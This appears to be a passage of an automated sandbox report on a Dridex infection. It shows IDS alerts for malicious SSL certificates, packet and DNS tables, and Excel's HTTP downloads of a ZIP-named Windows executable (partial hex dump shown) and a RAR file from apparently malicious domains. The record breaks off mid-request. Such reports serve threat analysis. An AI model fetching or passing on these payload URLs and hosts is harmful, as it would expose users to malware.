                01/13/21-16:39:23.452967TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349187221.126.244.72192.168.2.22
                01/13/21-16:39:26.484676TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349188221.126.244.72192.168.2.22
                01/13/21-16:39:26.999271TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949189195.231.69.151192.168.2.22
                01/13/21-16:39:28.082941TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949191195.231.69.151192.168.2.22
                01/13/21-16:39:30.368348TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349193221.126.244.72192.168.2.22
                01/13/21-16:39:31.476021TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349194221.126.244.72192.168.2.22
                01/13/21-16:39:31.979267TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949195195.231.69.151192.168.2.22
                01/13/21-16:39:33.080246TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949197195.231.69.151192.168.2.22
                01/13/21-16:39:35.353327TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349199221.126.244.72192.168.2.22
                01/13/21-16:39:36.496929TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349200221.126.244.72192.168.2.22
                01/13/21-16:39:36.954997TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949201195.231.69.151192.168.2.22
                01/13/21-16:39:38.110921TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949203195.231.69.151192.168.2.22
                01/13/21-16:39:40.366309TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349205221.126.244.72192.168.2.22
                01/13/21-16:39:41.540806TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349206221.126.244.72192.168.2.22
                01/13/21-16:39:42.009655TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949207195.231.69.151192.168.2.22
                01/13/21-16:39:44.632698TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949209195.231.69.151192.168.2.22
                01/13/21-16:39:47.274189TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349211221.126.244.72192.168.2.22
                01/13/21-16:39:49.438105TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949213195.231.69.151192.168.2.22
                01/13/21-16:39:49.940794TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349212221.126.244.72192.168.2.22
                01/13/21-16:39:51.527102TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949215195.231.69.151192.168.2.22
                01/13/21-16:39:52.826827TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349217221.126.244.72192.168.2.22
                01/13/21-16:39:54.409200TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949219195.231.69.151192.168.2.22
                01/13/21-16:39:54.904295TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349218221.126.244.72192.168.2.22
                01/13/21-16:39:56.499186TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949221195.231.69.151192.168.2.22
                01/13/21-16:39:57.763038TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349223221.126.244.72192.168.2.22
                01/13/21-16:39:59.356220TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949224195.231.69.151192.168.2.22
                01/13/21-16:39:59.878299TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349225221.126.244.72192.168.2.22
                01/13/21-16:40:01.477010TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949227195.231.69.151192.168.2.22
                01/13/21-16:40:02.732960TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349229221.126.244.72192.168.2.22
                01/13/21-16:40:04.428544TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949231195.231.69.151192.168.2.22
                01/13/21-16:40:05.009873TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349230221.126.244.72192.168.2.22
                01/13/21-16:40:06.596425TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949233195.231.69.151192.168.2.22
                01/13/21-16:40:08.074237TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349235221.126.244.72192.168.2.22
                01/13/21-16:40:09.657018TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949237195.231.69.151192.168.2.22
                01/13/21-16:40:09.964689TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349236221.126.244.72192.168.2.22
                01/13/21-16:40:11.582880TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949239195.231.69.151192.168.2.22
                01/13/21-16:40:13.046384TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349241221.126.244.72192.168.2.22
                01/13/21-16:40:14.644800TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949243195.231.69.151192.168.2.22
                01/13/21-16:40:14.987752TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349242221.126.244.72192.168.2.22
                01/13/21-16:40:16.579042TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949245195.231.69.151192.168.2.22
                01/13/21-16:40:18.032440TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349247221.126.244.72192.168.2.22
                01/13/21-16:40:19.641858TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949249195.231.69.151192.168.2.22
                01/13/21-16:40:19.984910TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349248221.126.244.72192.168.2.22
                01/13/21-16:40:21.579884TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949251195.231.69.151192.168.2.22
                01/13/21-16:40:23.045616TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349253221.126.244.72192.168.2.22
                01/13/21-16:40:24.651791TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949255195.231.69.151192.168.2.22
                01/13/21-16:40:24.944977TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349254221.126.244.72192.168.2.22
                01/13/21-16:40:26.532054TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949257195.231.69.151192.168.2.22
                01/13/21-16:40:28.012180TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349259221.126.244.72192.168.2.22
                01/13/21-16:40:29.607398TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949261195.231.69.151192.168.2.22
                01/13/21-16:40:29.930996TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349260221.126.244.72192.168.2.22
                01/13/21-16:40:31.533076TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949263195.231.69.151192.168.2.22
                01/13/21-16:40:33.000884TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349265221.126.244.72192.168.2.22
                01/13/21-16:40:34.584873TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949267195.231.69.151192.168.2.22
                01/13/21-16:40:34.938282TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349266221.126.244.72192.168.2.22
                01/13/21-16:40:36.533897TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949269195.231.69.151192.168.2.22
                01/13/21-16:40:38.001213TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349271221.126.244.72192.168.2.22
                01/13/21-16:40:39.590940TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949273195.231.69.151192.168.2.22
                01/13/21-16:40:39.933770TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349272221.126.244.72192.168.2.22
                01/13/21-16:40:41.513335TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949275195.231.69.151192.168.2.22
                01/13/21-16:40:43.006299TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349277221.126.244.72192.168.2.22
                01/13/21-16:40:44.604045TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949279195.231.69.151192.168.2.22
                01/13/21-16:40:44.921502TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349278221.126.244.72192.168.2.22
                01/13/21-16:40:46.520394TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949281195.231.69.151192.168.2.22
                01/13/21-16:40:47.956826TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349283221.126.244.72192.168.2.22
                01/13/21-16:40:49.550000TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949285195.231.69.151192.168.2.22
                01/13/21-16:40:49.870457TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349284221.126.244.72192.168.2.22
                01/13/21-16:40:51.482181TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949287195.231.69.151192.168.2.22
                01/13/21-16:40:52.937918TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349289221.126.244.72192.168.2.22
                01/13/21-16:40:54.586304TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949291195.231.69.151192.168.2.22
                01/13/21-16:40:54.830256TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349290221.126.244.72192.168.2.22
                01/13/21-16:40:56.427479TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949293195.231.69.151192.168.2.22
                01/13/21-16:40:58.046723TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349295221.126.244.72192.168.2.22
                01/13/21-16:40:59.642472TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949297195.231.69.151192.168.2.22
                01/13/21-16:40:59.820721TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349296221.126.244.72192.168.2.22
                01/13/21-16:41:01.463571TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949299195.231.69.151192.168.2.22
                01/13/21-16:41:03.014342TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349301221.126.244.72192.168.2.22
                01/13/21-16:41:04.632798TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949303195.231.69.151192.168.2.22
                01/13/21-16:41:04.848008TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349302221.126.244.72192.168.2.22
                01/13/21-16:41:06.449747TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949305195.231.69.151192.168.2.22
                01/13/21-16:41:07.996817TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349307221.126.244.72192.168.2.22
                01/13/21-16:41:09.614295TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949309195.231.69.151192.168.2.22
                01/13/21-16:41:09.845252TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349308221.126.244.72192.168.2.22
                01/13/21-16:41:11.453807TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949311195.231.69.151192.168.2.22
                01/13/21-16:41:13.039382TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349313221.126.244.72192.168.2.22

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jan 13, 2021 16:39:00.016732931 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.066108942 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.066272020 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.067065001 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.116235971 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.116538048 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.116590977 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.116631031 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.116635084 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.116666079 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.116677046 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.116683960 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.116719007 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.116719961 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.116761923 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.116774082 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.116801023 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.116806984 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.116841078 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.116848946 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.116882086 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.116924047 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.116929054 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.116950035 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.116985083 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.123063087 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.166317940 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166337967 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166357040 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166376114 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166392088 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166409016 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166424990 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166440010 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166469097 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.166498899 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.166507006 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166558981 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166562080 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.166591883 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.166659117 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166676044 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166688919 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166732073 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166744947 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166790962 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166810036 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166830063 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166852951 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.166877031 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166898012 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.166906118 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.166924000 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.166953087 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.168648958 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.215877056 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.215929985 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.215970993 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.215982914 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216010094 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216012001 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216018915 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216051102 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216063023 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216090918 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216094017 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216130018 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216146946 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216173887 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216178894 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216224909 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216231108 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216264009 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216290951 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216304064 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216317892 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216345072 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216345072 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216382980 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216394901 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216419935 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216423035 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216464996 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216471910 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216514111 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216517925 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216558933 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216563940 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216598034 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216614008 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216638088 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216653109 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216681957 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216696024 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216748953 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216804028 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216854095 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216856003 CET4916580192.168.2.2235.214.225.210
                Jan 13, 2021 16:39:00.216897964 CET804916535.214.225.210192.168.2.22
                Jan 13, 2021 16:39:00.216902018 CET4916580192.168.2.2235.214.225.210

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jan 13, 2021 16:38:59.945688009 CET5219753192.168.2.228.8.8.8
                Jan 13, 2021 16:39:00.002125978 CET53521978.8.8.8192.168.2.22
                Jan 13, 2021 16:39:01.100547075 CET5309953192.168.2.228.8.8.8
                Jan 13, 2021 16:39:01.159426928 CET53530998.8.8.8192.168.2.22
                Jan 13, 2021 16:39:07.247589111 CET5283853192.168.2.228.8.8.8
                Jan 13, 2021 16:39:07.305043936 CET53528388.8.8.8192.168.2.22
                Jan 13, 2021 16:39:07.312721968 CET6120053192.168.2.228.8.8.8
                Jan 13, 2021 16:39:07.313422918 CET4954853192.168.2.228.8.8.8
                Jan 13, 2021 16:39:07.361232996 CET53495488.8.8.8192.168.2.22
                Jan 13, 2021 16:39:07.380466938 CET53612008.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Jan 13, 2021 16:38:59.945688009 CET192.168.2.228.8.8.80x15d4Standard query (0)bipolarmalta.mccarthy.wsA (IP address)IN (0x0001)
                Jan 13, 2021 16:39:01.100547075 CET192.168.2.228.8.8.80x2642Standard query (0)oudtshoornpharmacies.co.zaA (IP address)IN (0x0001)
                Jan 13, 2021 16:39:07.312721968 CET192.168.2.228.8.8.80x887eStandard query (0)sendgrid.invoteqleads.comA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Jan 13, 2021 16:39:00.002125978 CET8.8.8.8192.168.2.220x15d4No error (0)bipolarmalta.mccarthy.ws35.214.225.210A (IP address)IN (0x0001)
                Jan 13, 2021 16:39:01.159426928 CET8.8.8.8192.168.2.220x2642No error (0)oudtshoornpharmacies.co.za154.66.197.71A (IP address)IN (0x0001)
                Jan 13, 2021 16:39:07.380466938 CET8.8.8.8192.168.2.220x887eNo error (0)sendgrid.invoteqleads.com104.24.124.127A (IP address)IN (0x0001)
                Jan 13, 2021 16:39:07.380466938 CET8.8.8.8192.168.2.220x887eNo error (0)sendgrid.invoteqleads.com172.67.195.135A (IP address)IN (0x0001)
                Jan 13, 2021 16:39:07.380466938 CET8.8.8.8192.168.2.220x887eNo error (0)sendgrid.invoteqleads.com104.24.125.127A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • bipolarmalta.mccarthy.ws
                • oudtshoornpharmacies.co.za
                • sendgrid.invoteqleads.com

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.224916535.214.225.21080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Jan 13, 2021 16:39:00.067065001 CET0OUTGET /lpxtpiw.zip HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: bipolarmalta.mccarthy.ws
                Connection: Keep-Alive
                Jan 13, 2021 16:39:00.116538048 CET2INHTTP/1.1 200 OK
                Server: nginx
                Date: Wed, 13 Jan 2021 15:38:57 GMT
                Content-Type: application/zip
                Content-Length: 303616
                Connection: keep-alive
                Last-Modified: Fri, 18 Dec 2020 21:13:44 GMT
                ETag: "4a200-5b6c39557f200"
                alt-svc: quic=":443"; ma=86400; v="43,39"
                Host-Header: 624d5be7be38418a3e2a818cc8b7029b
                X-Proxy-Cache: HIT
                Accept-Ranges: bytes
                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 f6 fb fe 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 72 04 00 00 2c 00 00 00 00 00 00 e0 1c 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 05 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 63 00 00 c8 00 00 00 00 f0 04 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 68 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 19 00 00 00 10 00 00 00 1a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e1 00 00 00 00 30 00 00 00 02 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 32 00 00 00 00 00 00 0a 00 00 00 00 40 00 00 00 02 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 32 00 0a 00 00 00 00 50 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 1c 00 00 00 60 00 00 00 1e 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 35 00 00 50 02 00 00 00 80 00 00 00 04 00 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 34 00 00 cc 52 04 00 00 90 00 00 00 54 04 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 73 72 63 00 00 00 e8 00 00 00 00 f0 04 00 00 02 00 00 00 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 dc 05 00 00 00 00 05 00 00 06 00 00 00 9c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_!2r,0ch.text `.rdata0@@.2@ @@.rdata2P"@@.data`$@.text5PB @.text4RTF @.rsrc@@.reloc@B


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.2249166154.66.197.7180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Jan 13, 2021 16:39:01.389254093 CET323OUTGET /dyu828kp.rar HTTP/1.1
                Accept: */*
